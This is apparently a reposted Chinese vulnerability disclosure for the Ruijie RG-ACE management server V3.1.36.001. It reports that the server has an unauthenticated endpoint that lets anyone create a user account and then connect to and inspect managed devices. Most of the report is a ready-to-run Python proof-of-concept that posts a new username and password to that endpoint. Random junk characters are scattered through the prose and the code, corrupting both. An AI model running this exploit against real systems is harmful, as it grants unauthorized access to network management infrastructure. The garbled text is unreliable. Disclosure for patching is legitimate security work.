锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


测试的具体版本是
- c! e9 z% _9 m8 c: ^! c产品名称: 锐捷应用控制引擎
2 z0 Z. z; g" u! q7 L版本号: 3.1.36.001 TC
编译时间: 201104291730


8 J6 Q" u$ @# i3 ~! C漏洞证明：

$ o# O, S- Y- F7 W
' s! M) E' ^3 `, g


0 b+ V) n6 k3 C, B
& \- p# o! b3 O执行脚本
( b$ b2 Z; n" Y9 x9 o#! /usr/bin/env python
#coding=gbk
9 ]6 D6 P, A" v' G#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
- U' J, u" E% V0 oopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
1 ]6 I* v% p, O5 A("useropermanager","userManager"),
7 q( H6 I7 N( y% G, T3 X("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
5 S0 X: j0 w( g- _("trueName","ad"),
("email",""),
1 X! O. k# w/ F( p! T2 K3 T("mobilePhone",""),
6 H  J( p# c: D* _) X  k! h("officePhone",""),
6 y9 q: S  G+ U; r4 n("addr",""),
("submit","确定"))
) ^# Y% n- D8 D, O  T2 |urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
  k- ^) t0 R0 Y2 I  {! M- o# h
! f& J# `) l5 H. m/ u# c! {登录，连接设备
! K* S8 D: X3 A0 `
( e, ?# I. p7 @
. @* H: k/ ]; F9 e0 m

0 _' Y. U- k9 h. t: g
- j2 E9 w! ~) T7 |' {默认的管理员admin权限更大点


1 g. {! p& M. S  h
8 @6 Q) A9 A- }3 y1 X
2 W$ P3 B& U" N5 H* `
修复方案：
加强对接口的权限验证